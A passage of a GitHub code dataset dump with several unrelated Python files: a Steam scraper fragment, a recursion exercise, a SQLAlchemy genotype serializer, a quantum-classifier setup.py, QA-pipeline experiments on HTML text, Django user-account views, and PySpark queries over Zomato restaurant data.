in price[i]:\n price_ = 0\n break\n\n feature = tree_info.xpath('//*[@class=\"game_area_details_specs\"]//text()')\n feature = [clean_trn(x) for x in feature]\n feature_count = len(feature)\n\n learning_about = tree_info.xpath('//*[@class=\"game_area_details_specs learning_about\"]')\n steam_learning = 0\n if len(learning_about) > 0:\n steam_learning = 1\n\n new_item_dict = {\n 'game_id': app_id,\n 'name': app_name,\n 'request_status': 'Package',\n 'game_title': game_title,\n 'developer': developer,\n 'developer_count': developer_count,\n 'publisher': publisher,\n 'publisher_count': publisher_count,\n 'franchiser': franchiser,\n 'franchiser_count': franchiser_count,\n 'release_date': release_date,\n 'description_title': description_title,\n 'description_long': description_long,\n 'price': price_,\n 'feature': feature,\n 'feature_count': feature_count,\n 'steam_learning': steam_learning,\n 'language': language,\n 'language_count': language_count}\n return new_item_dict","repo_name":"zhengyanzhao1997/Steam-optimal_distinctiveness-anly","sub_path":"craw_data_code/craw_stem_game_info/content_func.py","file_name":"content_func.py","file_ext":"py","file_size_in_byte":21249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10317179190","text":"'''Write a recursive function called raise_power() that takes in two \ninteger parameters, the first parameter being the base number and the second \nparameter being the power you want to raise it to. This function will return the number \nraised to the given power. For example, if you called raise_power(4, 2) you would get 16 \nreturned which is 4^2. Remember to think about what the base and recursive cases will be and \nstart with an iterative approach if you don't know where to begin. '''\n\ndef raise_power(base, power):\n #base case, if the power is 1, the base numbeer doesnt change.\n if (power == 1):\n return base\n else:\n #if the power is greater than 1, the base number multiply itself until the power reaches 0\n return (base * raise_power(base, power-1))\n\n\nprint(raise_power(4,2)) #expect to see 16\n","repo_name":"xingY97/Trees-Sorting","sub_path":"quiz_problem.py","file_name":"quiz_problem.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35372597765","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom random import Random\nfrom typing import List\n\nimport sqlalchemy\nfrom item import Item\nfrom phenotype import Phenotype\nfrom sqlalchemy.ext.asyncio.session import AsyncSession\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.future import select\n\nfrom revolve2.core.database import IncompatibleError, Serializer\n\n\n@dataclass\nclass Genotype:\n items: List[bool]\n\n\ndef random(rng: Random, has_item_prob: float, num_items: int) -> Genotype:\n return Genotype([rng.random() < has_item_prob for _ in range(num_items)])\n\n\ndef develop(genotype: Genotype, items: List[Item], maximum_weight: float) -> Phenotype:\n phenotype = []\n total_weight = 0\n for has_item, item in zip(genotype.items, items):\n if has_item and total_weight + item.weight < maximum_weight:\n phenotype.append(True)\n else:\n phenotype.append(False)\n\n return Phenotype(phenotype)\n\n\nclass GenotypeSerializer(Serializer[Genotype]):\n @classmethod\n async def create_tables(cls, session: AsyncSession) -> None:\n await (await session.connection()).run_sync(DbGenotype.metadata.create_all)\n\n @classmethod\n def identifying_table(cls) -> str:\n return DbGenotype.__tablename__\n\n @classmethod\n async def to_database(\n cls, session: AsyncSession, objects: List[Genotype]\n ) -> List[int]:\n dbobjects = [\n DbGenotype(items=\"\".join([\"1\" if x else \"0\" for x in g.items]))\n for g in objects\n ]\n session.add_all(dbobjects)\n await session.flush()\n ids = [\n dbfitness.id for dbfitness in dbobjects if dbfitness.id is not None\n ] # cannot be none because not nullable. check if only there to silence mypy.\n assert len(ids) == len(objects) # but check just to be sure\n return ids\n\n @classmethod\n async def from_database(\n cls, session: AsyncSession, ids: List[int]\n ) -> List[Genotype]:\n rows = (\n (await session.execute(select(DbGenotype).filter(DbGenotype.id.in_(ids))))\n .scalars()\n .all()\n )\n\n if len(rows) != len(ids):\n raise IncompatibleError()\n\n id_map = {t.id: t for t in rows}\n items_str = [id_map[id].items for id in ids]\n items_bool = [[item == \"1\" for item in items] for items in items_str]\n return [Genotype(items) for items in items_bool]\n\n\nDbBase = declarative_base()\n\n\nclass DbGenotype(DbBase):\n __tablename__ = \"genotype\"\n\n id = sqlalchemy.Column(\n sqlalchemy.Integer,\n nullable=False,\n unique=True,\n autoincrement=True,\n primary_key=True,\n )\n items = sqlalchemy.Column(sqlalchemy.String, nullable=False)\n","repo_name":"8Mile313/EC_Robot_Parkour","sub_path":"revolve2-master/examples/simple_optimization/genotype.py","file_name":"genotype.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28229536798","text":"import setuptools\nimport inspect\nimport sys\nimport os\nimport re\n\nREQUIREMENTS_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"env\", \"requirements.txt\")\nwith open(REQUIREMENTS_PATH) as f:\n REQUIREMENTS = f.read().splitlines()\n\nif not hasattr(setuptools, 'find_namespace_packages') or not inspect.ismethod(setuptools.find_namespace_packages):\n print(\"Your setuptools version:'{}' does not support PEP 420 (find_namespace_packages). \"\n \"Upgrade it to version >='40.1.0' and repeat install.\".format(setuptools.__version__))\n sys.exit(1)\n\nVERSION_PATH = os.path.join(os.path.dirname(__file__), \"VERSION.txt\")\nwith open(VERSION_PATH, \"r\") as version_file:\n VERSION = version_file.read().strip()\n\n# Read long description from README.\nREADME_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"README.md\")\nwith open(README_PATH) as readme_file:\n README = re.sub(\n \".*\",\n \"\",\n readme_file.read(),\n flags=re.S | re.M,\n )\n\n\nsetuptools.setup(\n name='quantum-image-classifier',\n version=VERSION,\n description='Quatum image classifier: A library of different quantum algorithms used to classify images',\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/jorgevazquezperez/Quantum-image-classifier',\n author='Jorge Vázquez Pérez',\n author_email='jorge.vazper@gmail.com',\n #license='Apache-2.0',\n classifiers=[\n \"Environment :: Console\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3.10\",\n \"Topic :: Scientific/Engineering\"\n ],\n keywords='qiskit quantum machine learning ml centroids',\n packages=[\n \"quantum_image_classifier\", \n \"quantum_image_classifier.classifier_algorithms\", \n \"quantum_image_classifier.encoding\", \n \"quantum_image_classifier.gates\",\n \"quantum_image_classifier.data_treatment\",\n \"quantum_image_classifier.CESGA_connection\",\n \"quantum_image_classifier.visuals\" ],\n install_requires=REQUIREMENTS,\n include_package_data=True,\n python_requires=\"<3.10\",\n zip_safe=False\n)","repo_name":"jorgevazquezperez/Quantum-image-classifier","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"6174487869","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 2 01:02:14 2020\n\n@author: shyambhu.mukherjee\n\"\"\"\n\nimport pdfminer\nimport io\nfrom pdfminer.layout import LAParams\nfrom pdfminer import high_level\nfrom pdfminer.high_level import extract_text_to_fp as extex\n\ndef extract_raw_text(pdf_filename):\n output = io.StringIO()\n laparams = LAParams() \n # Using the defaults seems to work fine\n\n with open(pdf_filename, \"rb\") as pdffile:\n extex(pdffile, output, laparams=laparams)\n\n return output.getvalue()\ntext1 = \"\"\n#text1 = extract_raw_text('/home/shyambhu.mukherjee/Downloads/duckett.pdf')\ntext2 = extract_raw_text('/home/shyambhu.mukherjee/Downloads/html_tutorial.pdf')\ntext_collated = text1 + text2\n\nf = open('html_corpus.txt','w')\nf.write(text_collated)\nf.close()\n\ndef summary_utils(summary):\n summar = summary[0]['summary_text']\n return summar\n\nf = open('html_corpus.txt','r')\nfultext = f.read()\n#bart-large-cnn model\nimport transformers\nfrom transformers import pipeline\nqaObj = pipeline('question-answering')\nans = qaObj(question = \"write html code for red button\",context = fultext)\n\"\"\"\n{'score': 0.05844178717584647,\n 'start': 56248,\n 'end': 56269,\n 'answer': '405 Language Codes:'}\n\"\"\"\nans = qaObj(question = \"create button\",context = fultext)\n\"\"\"\n{'score': 0.9545003905971328,\n 'start': 74361,\n 'end': 74385,\n 'answer': 'height Numeric Value'}\n\"\"\"\nans = qaObj(question = \"write paragraph tag\",context = fultext)\n\"\"\"\nsame answer as before.\n\"\"\"\nans = qaObj(question = \"paragraph tag\",context = fultext)\n\n## code example from w3school\nsmall_text = r\"\"\"A paragraph always starts on a new line, and is usually a block of text.\n HTML Paragraphs\n The HTML

        element defines a paragraph.\n A paragraph always starts on a new line, and browsers automatically add some white space (a margin) before and after a paragraph.\n Example

        This is a paragraph.

        \n

        This is another paragraph.

        \n HTML Display\n You cannot be sure how HTML will be displayed.\n Large or small screens, and resized windows will create different results.\n With HTML, you cannot change the display by adding extra spaces or extra lines in your HTML code.\n The browser will automatically remove any extra spaces and lines when the page is displayed:\n Example

        This paragraph contains a lot of lines in the source code, \n but the browser ignores it.

        This paragraph contains \n a lot of spaces in the source code, but the browser ignores it.

        \n \"\"\"\n \nans = qaObj(question = \"write paragraph tag\", context = small_text)\n\"\"\"{'score': 0.27491484847131886,\n 'start': 90,\n 'end': 131,\n 'answer': 'HTML Paragraphs The HTML'}\n\"\"\"\nans = qaObj(question = \"what element is a paragraph tag\", context = small_text)\n\"\"\"\n{'score': 0.5403857393915423, 'start': 127, 'end': 131, 'answer': 'HTML'}\n\"\"\"\nans = qaObj(question = \"what defines a pararaph\",context = small_text)\n\"\"\"\n{'score': 0.47865264802688756,\n 'start': 90,\n 'end': 143,\n 'answer': 'HTML Paragraphs The HTML

        element'}\n\"\"\"\n\ngeeks_text = open('geeks_para.txt','r').read()\nans = qaObj(question = \"what defines a paragraph\",context = geeks_text)\n\"\"\"\n{'score': 0.8452085668869813, 'start': 24, 'end': 28, 'answer': 'HTML'}\n\"\"\"\nans = qaObj(question = \"what tag defines a paragraph\",context = geeks_text)\n\"\"\"\n{'score': 0.864106661039159, 'start': 24, 'end': 28, 'answer': 'HTML'}\n\"\"\"\nans = qaObj(question = \"what is a paragraph tag?\",context = geeks_text)\n\"\"\"\n{'score': 0.12643090688080516,\n 'start': 61,\n 'end': 90,\n 'answer': 'both opening and closing tag.'}\n\"\"\"","repo_name":"shyamcody/nlp-experiments","sub_path":"book_bart_combination.py","file_name":"book_bart_combination.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"38972842802","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.forms import model_to_dict\nfrom restaurant.utils import get_filtered_restaurants, restaurants_to_dict\nfrom django.core.paginator import Paginator\n\nfrom .models import (\n User_Profile,\n Review,\n Comment,\n DineSafelyUser,\n Report_Ticket_Comment,\n Report_Ticket_Review,\n Preferences,\n UserActivityLog,\n Restaurant,\n Email,\n)\n\nfrom restaurant.models import Categories\nimport json\n\n# from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render, redirect\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.contrib.auth.tokens import PasswordResetTokenGenerator\nfrom django.contrib.auth import get_user_model\nfrom django.utils.encoding import force_text\nfrom django.http import HttpResponse, HttpResponseBadRequest, HttpResponseRedirect\n\n\nfrom .utils import (\n send_reset_password_email,\n send_verification_email,\n send_feedback_email,\n send_verification_secondary_email,\n)\n\nfrom .forms import (\n UserCreationForm,\n UserProfileCreationForm,\n ResetPasswordForm,\n UpdatePasswordForm,\n GetEmailForm,\n UserPreferenceForm,\n ContactForm,\n ProfileUpdateForm,\n AddUserEmailForm,\n)\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef user_login(request):\n if request.user.is_authenticated:\n return redirect(\"index\")\n if request.method == \"POST\":\n form = AuthenticationForm(request=request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n user = authenticate(username=username, password=password)\n logger.info(\"valid\")\n if user is not None:\n login(request, user)\n return redirect(\"user:register\")\n\n # Check if the user is active or not.\n for error in form.errors.as_data()[\"__all__\"]:\n if \"This account is inactive.\" in error:\n user = get_user_model().objects.get(username=form.data[\"username\"])\n send_verification_email(request, user.email)\n return render(\n request=request, template_name=\"sent_verification_email.html\"\n )\n else:\n form = AuthenticationForm()\n return render(request, template_name=\"login.html\", context={\"form\": form})\n\n\ndef register(request):\n if request.user.is_authenticated:\n return redirect(\"index\")\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.is_active = False\n user.save()\n\n form2 = UserProfileCreationForm(user=user, data=request.POST)\n form2.save()\n\n send_verification_email(request, form.cleaned_data.get(\"email\"))\n return render(request=request, template_name=\"sent_verification_email.html\")\n else:\n form = UserCreationForm()\n return render(\n request=request, template_name=\"register.html\", context={\"form\": form}\n )\n\n\ndef show_report(request):\n if not request.user.is_staff:\n messages.warning(request, \"You are not authorized to do so.\")\n return redirect(\"user:profile\")\n\n internal_reviews = list(\n Report_Ticket_Review.objects.all()\n .select_related(\"user\")\n .select_related(\"review\")\n .values(\n \"id\",\n \"review_id\",\n \"reason\",\n \"time\",\n \"user__id\",\n \"user__username\",\n \"review__content\",\n \"review__image1\",\n \"review__image2\",\n \"review__image3\",\n )\n )\n\n internal_comments = list(\n Report_Ticket_Comment.objects.all()\n .select_related(\"user\")\n .select_related(\"comment\")\n .values(\n \"id\",\n \"comment_id\",\n \"reason\",\n \"time\",\n \"user__id\",\n \"user__username\",\n \"comment__text\",\n )\n )\n\n return render(\n request=request,\n template_name=\"admin_comment.html\",\n context={\n \"internal_reviews\": internal_reviews,\n \"internal_comments\": internal_comments,\n },\n )\n\n\n# @login_required()\ndef user_facing(request, user_id):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n user = DineSafelyUser.objects.get(pk=user_id)\n user_profile = User_Profile.objects.get(user=user)\n favorite_restaurant_list = user.favorite_restaurants.all()\n user_pref_list = user.preferences.all()\n user_pref_list_json = []\n internal_reviews = list(\n Review.objects.filter(user=user)\n .order_by(\"-time\")\n .all()[:50]\n .values(\n \"user\",\n \"user__username\",\n \"user__user_profile__photo\",\n \"id\",\n \"rating\",\n \"rating_safety\",\n \"rating_door\",\n \"rating_table\",\n \"rating_bathroom\",\n \"rating_path\",\n \"time\",\n \"content\",\n \"image1\",\n \"image2\",\n \"image3\",\n \"restaurant__restaurant_name\",\n \"restaurant__yelp_detail__img_url\",\n \"restaurant__id\",\n )\n )\n for pref in user_pref_list:\n pref_dic = model_to_dict(pref)\n user_pref_list_json.append(pref_dic)\n category_pref = user.preferences.filter(preference_type=\"category\")\n neighbourhood_pref = user.preferences.filter(preference_type=\"neighbourhood\")\n rating_pref = user.preferences.filter(preference_type=\"rating\")\n compliance_pref = user.preferences.filter(preference_type=\"compliance\")\n price_pref = user.preferences.filter(preference_type=\"price\")\n user_pref = [\n category_pref,\n neighbourhood_pref,\n rating_pref,\n compliance_pref,\n price_pref,\n ]\n return render(\n request=request,\n template_name=\"facing_page.html\",\n context={\n \"favorite_restaurant_list\": favorite_restaurant_list,\n \"user_pref\": user_pref,\n \"user_pref_json\": json.dumps(user_pref_list_json, cls=DjangoJSONEncoder),\n \"user_profile\": user_profile,\n \"profile_pic\": \"\" if user_profile is None else user_profile.photo,\n \"internal_reviews\": json.dumps(internal_reviews, cls=DjangoJSONEncoder),\n \"facing_page_user_id\": user.username,\n },\n )\n\n\n# @login_required()\ndef user_reviews(request):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n user = request.user\n internal_reviews = list(\n Review.objects.filter(user=user)\n .order_by(\"-time\")\n .all()[:50]\n .values(\n \"user\",\n \"user__username\",\n \"user__user_profile__photo\",\n \"id\",\n \"rating\",\n \"rating_safety\",\n \"rating_door\",\n \"rating_table\",\n \"rating_bathroom\",\n \"rating_path\",\n \"time\",\n \"content\",\n \"image1\",\n \"image2\",\n \"image3\",\n \"restaurant__restaurant_name\",\n \"restaurant__yelp_detail__img_url\",\n \"restaurant__id\",\n \"hidden\",\n )\n )\n return render(\n request=request,\n template_name=\"profile_review.html\",\n context={\n \"internal_reviews\": json.dumps(internal_reviews, cls=DjangoJSONEncoder),\n \"user_id\": request.user.id,\n },\n )\n\n\n# @login_required()\ndef post_logout(request):\n logout(request)\n return redirect(\"user:login\")\n\n\n# @login_required()\ndef profile(request):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n\n user = request.user\n if request.method == \"POST\":\n if \"submit-add-email-form\" in request.POST:\n form = AddUserEmailForm(user, request.POST)\n if form.is_valid():\n form.save()\n send_verification_secondary_email(\n request, form.cleaned_data.get(\"email\")\n )\n messages.success(\n request,\n \"We have sent further instructions to your email. \"\n + \"Please follow the steps for verifying your email.\",\n )\n return redirect(\"user:profile\")\n else:\n for field in form:\n for error in field.errors:\n messages.error(request, error)\n elif \"submit-delete-email-form\" in request.POST:\n user_email = Email.objects.filter(\n user=user, email=request.POST[\"email\"]\n ).first()\n if user_email:\n user_email.delete()\n return redirect(\"user:profile\")\n elif \"primary_email\" in request.POST:\n user_email = Email.objects.filter(user=user, active=True).first()\n if user_email:\n user.email = user_email.email\n user.save()\n user_email.delete()\n return redirect(\"user:profile\")\n else:\n messages.error(\n request,\n \"You do not have other active emails. \"\n + \"Please add/activate one before deleting primary email.\",\n )\n else:\n form = ProfileUpdateForm(user=user, data=request.POST)\n if form.is_valid():\n if \"profile-pic\" in request.FILES:\n profile_pic = form.save_image(request.FILES[\"profile-pic\"])\n User_Profile.objects.update_or_create(\n user=user, defaults={\"photo\": profile_pic}\n )\n else:\n default_profile_pic = (\n \"https://s3-media3.fl.yelpcdn.com\"\n \"/photo/O8CmQtEeOUvMTFk0iMn5sw/o.jpg\"\n )\n profile_pic_src = request.POST[\"profile-pic-src\"]\n if profile_pic_src == default_profile_pic:\n User_Profile.objects.update_or_create(\n user=user, defaults={\"photo\": None}\n )\n form.save()\n return redirect(\"user:profile\")\n user_profile = User_Profile.objects.get(user=user)\n favorite_restaurant_list = user.favorite_restaurants.all()\n user_pref_list = user.preferences.all()\n user_pref_list_json = []\n for pref in user_pref_list:\n pref_dic = model_to_dict(pref)\n user_pref_list_json.append(pref_dic)\n category_pref = user.preferences.filter(preference_type=\"category\")\n neighbourhood_pref = user.preferences.filter(preference_type=\"neighbourhood\")\n rating_pref = user.preferences.filter(preference_type=\"rating\")\n compliance_pref = user.preferences.filter(preference_type=\"compliance\")\n price_pref = user.preferences.filter(preference_type=\"price\")\n categories = Preferences.objects.filter(preference_type=\"category\")\n neighbourhoods = Preferences.objects.filter(preference_type=\"neighbourhood\")\n user_pref = [\n category_pref,\n neighbourhood_pref,\n rating_pref,\n compliance_pref,\n price_pref,\n ]\n user_emails = Email.objects.filter(user=user)\n\n return render(\n request=request,\n template_name=\"profile.html\",\n context={\n \"favorite_restaurant_list\": favorite_restaurant_list,\n \"user_pref_json\": json.dumps(user_pref_list_json, cls=DjangoJSONEncoder),\n \"user_profile\": user_profile,\n \"profile_pic\": \"\" if user_profile is None else user_profile.photo,\n \"categories\": categories,\n \"neighbourhoods\": neighbourhoods,\n \"user_pref\": user_pref,\n \"user_emails\": user_emails,\n },\n )\n\n\n# view the viewing history\ndef view_history(request, page):\n viewed_restaurants = []\n if request.user.is_authenticated:\n user_activity = UserActivityLog.objects.filter(user=request.user)\n # get viewed restaurants\n for idx in range(user_activity.count()):\n viewed_restaurants.append(user_activity[idx].restaurant)\n viewed_restaurants = restaurants_to_dict(viewed_restaurants)\n # Add last visit date\n for idx in range(user_activity.count()):\n viewed_restaurants[idx][\"last_visit\"] = user_activity[idx].last_visit.date()\n page_obj = Paginator(viewed_restaurants, 8).get_page(page)\n # add restaurants to context\n context = {\n \"total_restaurant_count\": len(viewed_restaurants),\n \"page_obj\": page_obj,\n }\n return render(request, \"view_history.html\", context=context)\n\n\ndef delete_viewed_restaurant(request, business_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n user = request.user\n # current restaurant we want to delete\n restaurant_to_delete = Restaurant.objects.filter(\n business_id=business_id\n ).first()\n # delete activity log\n UserActivityLog.objects.filter(\n user=user, restaurant=restaurant_to_delete\n ).first().delete()\n return HttpResponse(\"Restaurant Removed\")\n\n\ndef clear_viewed_restaurants(request):\n if request.method == \"POST\" and request.user.is_authenticated:\n UserActivityLog.objects.filter(user=request.user).delete()\n return HttpResponse(\"Restaurants Cleared\")\n\n\ndef reset_password_link(request, base64_id, token):\n if request.method == \"POST\":\n\n uid = force_text(urlsafe_base64_decode(base64_id))\n\n user = get_user_model().objects.get(pk=uid)\n if not user or not PasswordResetTokenGenerator().check_token(user, token):\n return HttpResponse(\"This is invalid!\")\n form = ResetPasswordForm(request.POST)\n if form.is_valid():\n form.save(uid)\n return redirect(\"user:login\")\n else:\n return HttpResponse(\"Invalid\")\n else:\n form = ResetPasswordForm()\n return render(\n request=request, template_name=\"reset.html\", context={\"form\": form}\n )\n\n\ndef verify_user_link(request, base64_id, token):\n uid = force_text(urlsafe_base64_decode(base64_id))\n user = get_user_model().objects.get(pk=uid)\n if not user or not PasswordResetTokenGenerator().check_token(user, token):\n return HttpResponse(\"This is invalid!\")\n user.is_active = True\n user.save()\n\n return redirect(\"user:login\")\n\n\ndef verify_email_link(request, base64_id, base64_email, token):\n uid = force_text(urlsafe_base64_decode(base64_id))\n user = get_user_model().objects.get(pk=uid)\n if not user or not PasswordResetTokenGenerator().check_token(user, token):\n return HttpResponse(\"This is invalid!\")\n email = force_text(urlsafe_base64_decode(base64_email))\n user_email = Email.objects.filter(user=user, email=email).first()\n if not user_email:\n return HttpResponse(\"This is invalid!\")\n user_email.active = True\n user_email.save()\n messages.success(request, \"Your email \" + email + \" has been activated!\")\n return redirect(\"user:profile\")\n\n\ndef forget_password(request):\n if request.method == \"POST\":\n form = GetEmailForm(request.POST)\n if form.is_valid():\n send_reset_password_email(request, form.cleaned_data.get(\"email\"))\n return render(request=request, template_name=\"sent_email.html\")\n return render(\n request=request, template_name=\"reset_email.html\", context={\"form\": form}\n )\n else:\n form = GetEmailForm()\n return render(\n request=request, template_name=\"reset_email.html\", context={\"form\": form}\n )\n\n\ndef add_preference(request):\n if request.method == \"POST\":\n form = UserPreferenceForm(request.POST)\n if form.is_valid():\n form.save(user=request.user)\n return HttpResponse(\"Preference Saved\")\n return HttpResponseBadRequest(\"Bad Request\")\n\n\ndef delete_preference(request, preference_type, value):\n if request.method == \"POST\":\n user = request.user\n user.preferences.remove(\n Preferences.objects.filter(\n preference_type=preference_type, value=value\n ).first()\n )\n logger.info(\n \"Removed preference {}: {} for {}\".format(preference_type, value, user)\n )\n return HttpResponse(\"Preference Removed\")\n\n\ndef update_password(request):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n\n user = request.user\n if request.method == \"POST\":\n form = UpdatePasswordForm(user=user, data=request.POST)\n if form.is_valid():\n form.save(user)\n return redirect(\"user:login\")\n\n error_list = []\n for field in form:\n for error in field.errors:\n error_list.append(error)\n context = {\"status\": \"400\", \"errors\": error_list}\n response = HttpResponse(json.dumps(context), content_type=\"application/json\")\n response.status_code = 400\n return response\n\n\ndef contact_form(request):\n if request.method == \"POST\":\n form = ContactForm(request.POST)\n if form.is_valid():\n email = form.cleaned_data.get(\"email\")\n subject = form.cleaned_data.get(\"subject\")\n message = form.cleaned_data.get(\"message\")\n # Sends user answers to website email\n feedback_sent = send_feedback_email(request, email, subject, message)\n if feedback_sent:\n return redirect(\"user:request_received\")\n else:\n messages.error(request, \"An error occurred, feedback was not sent!\")\n else:\n messages.error(request, \"Invalid or missing data in contact form!\")\n form = ContactForm()\n return render(\n request=request, template_name=\"contact_us.html\", context={\"form\": form}\n )\n\n\ndef request_received(request):\n return render(request=request, template_name=\"request_received.html\")\n","repo_name":"gcivil-nyu-org/spring2021-cs-gy-9223-class","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16851980191","text":"\nimport findspark\nfindspark.init()\n\n\nimport pyspark\nfrom pyspark import SparkContext, SQLContext\nfrom pyspark.sql import SparkSession\nspark = pyspark.sql.SparkSession.builder \\\n .config(\"spark.driver.maxResultSize\", \"2g\")\\\n .getOrCreate()\n\n\nfrom main import *\n\n\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\n\nrestaurant_schema = StructType([\n StructField('Restaurant_Name', StringType(), True),\n StructField('City', StringType(), True),\n StructField('Restaurant_ID', IntegerType(), False),\n StructField('Has_Table_booking', StringType(), True),\n StructField('Has_Online_delivery', StringType(), True),\n StructField('Is_delivering_now', StringType(), True),\n StructField('Country_Code', IntegerType(), False)\n ])\n\nfoods_schema = StructType([\n StructField('Country_Code', IntegerType(), False),\n StructField('Cuisines', StringType(), False),\n StructField('Rating', FloatType(), False),\n StructField('Rating_text', StringType(), False),\n StructField('Votes', IntegerType(), False)\n \n ])\n\n\ncost_schema = StructType([\n StructField('Cost_per_person', IntegerType(), False),\n StructField('Currency', StringType(), True),\n StructField('Price_range', IntegerType(), False),\n StructField('Country_Code', IntegerType(), False)\n ])\n\ncountry_schema = StructType([\n StructField('Country_Code', IntegerType(), False),\n StructField('Country', StringType(), True),\n StructField('Per_Capita_Income(USD)', IntegerType(), False)\n ])\n\ncost_new_schema = StructType([\n StructField('Cost_per_person', IntegerType(), False),\n StructField('Currency', StringType(), True),\n StructField('Price_range', IntegerType(), False),\n StructField('Country_Code', IntegerType(), False),\n StructField('Cost_USD', FloatType(), False)\n ])\n\n\n#Restaurant.write.format('csv').option('header',True).mode('overwrite').option('sep',',').save(\"hdfs://localhost:9000/fuse_project/Restaurant.csv\")\n#print(\"Data Written\")\n\nRestaurant=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Restaurant.csv\", header=True, schema = restaurant_schema )\nFoods=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Foods.csv\", header=True, schema = foods_schema)\nCost=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Cost.csv\", header=True, schema = cost_schema)\nCountry=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Country.csv\" , header=True, schema = country_schema)\nCost_new=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Cost_new.csv\" , header=True, schema = cost_new_schema)\n\n\n\nFoods=Foods.select(\"Country_Code\",\"Rating\",\"Rating_text\",\"Votes\",split(col(\"Cuisines\"),\",\").alias(\"Cuisine\"))\n#Foods.show()\n\n\n#Loading dataframes into POstgres database\n\n\n\n\n# # 1. Cities with maximum Restaurants\ndef task1():\n task1= Restaurant.groupBy(\"City\").count().sort(col(\"count\").desc())\n return task1\n\n\n\n# # 2. Which cuisine is famous (most ordered) in Ahmedabad city?\n\ndef task2():\n task2= Restaurant.join(Foods, Restaurant.Country_Code== Foods.Country_Code,\"inner\").select(\"City\",\"Cuisine\",\"Rating_text\")\n\n task21=task2.filter(task2.City==\"Ahmedabad\")\n#task21.show(2,truncate=False)\n\n task22 = task21.select(task21.City,explode(task21.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n\n\n task23=task22.groupBy(\"Cuisine\").count().distinct().sort(col(\"count\").desc())\n return task23\n# OR\n\n# task_22=task21.filter(task21.Rating_text == \"Excellent\")\n#task_22.show()\n\n\n#task_23 = task_22.select(task_22.Rating_text,explode(task_22.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n#task_23.groupBy(\"Cuisine\").count().sort(col(\"count\").desc()).show()\n\n\n\n# # 3.how per capita income affects food ordering behaviour?\ndef task3():\n task3= Foods.join(Country,\"Country_Code\",\"inner\")\n task31= Country.select(max(\"Per_Capita_Income(USD)\"), min(\"Per_Capita_Income(USD)\"))\n#task31.show()\n\n#Analysing behaviour of customers having high per capita income i.e 68309, what kind of foods do they order\n\n task3= task3.withColumnRenamed(\"Per_Capita_Income(USD)\",\"PCI\")\n\n task33= task3.filter(task3.PCI==68309).select(task3.Country,task3.PCI,task3.Rating,explode(task3.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n return task33\n\n# # 4. Resturants with maximum (high) ratings (Excellent rating and > 4.9) ?\n\ndef task4():\n task4= Restaurant.join(Foods, \"Country_Code\",\"inner\").select(\"Restaurant_Name\",\"Rating\", \"Rating_text\")\n#task4.show()\n\n\n task41=task4.filter(task4.Rating_text==\"Excellent\").distinct()\n\n\n task42=task41.filter(task41.Rating >= 4.9).distinct()\n return task42\n\n\n# # 5. How votes affects the price range ?\n\ndef task5():\n task5= Foods.join(Cost, \"Country_Code\",\"inner\")\n#task5.show()\n\n task52=task5.select(max(\"Votes\"), min(\"Votes\"))\n task53=task5.filter(task5.Votes==10934).select(\"Votes\",\"Price_range\")\n\n return task53\n\n\n# # 6.Top 5 popular ratings per counts?\n\ndef task6():\n task6=Foods.select(\"Rating\")\n task6= task6.filter(task6.Rating<=5.0).groupBy(\"Rating\").count().sort(col(\"count\").desc())\n#task6.show(5)\n return task6\n\n\n \n# # 7. How Table booking and online delievery increases or decreases food ordering?\n\ndef task7():\n task7= Restaurant.join(Foods, \"Country_Code\", \"inner\").select(\"Cuisine\", \"Has_Table_booking\",\"Has_Online_delivery\")\n#task7.show()\n\n task71= task7.filter(task7.Has_Table_booking == \"Yes\").groupBy(\"Has_Table_booking\").count()\n task72= task7.filter(task7.Has_Table_booking == \"No\").groupBy(\"Has_Table_booking\").count()\n task73= 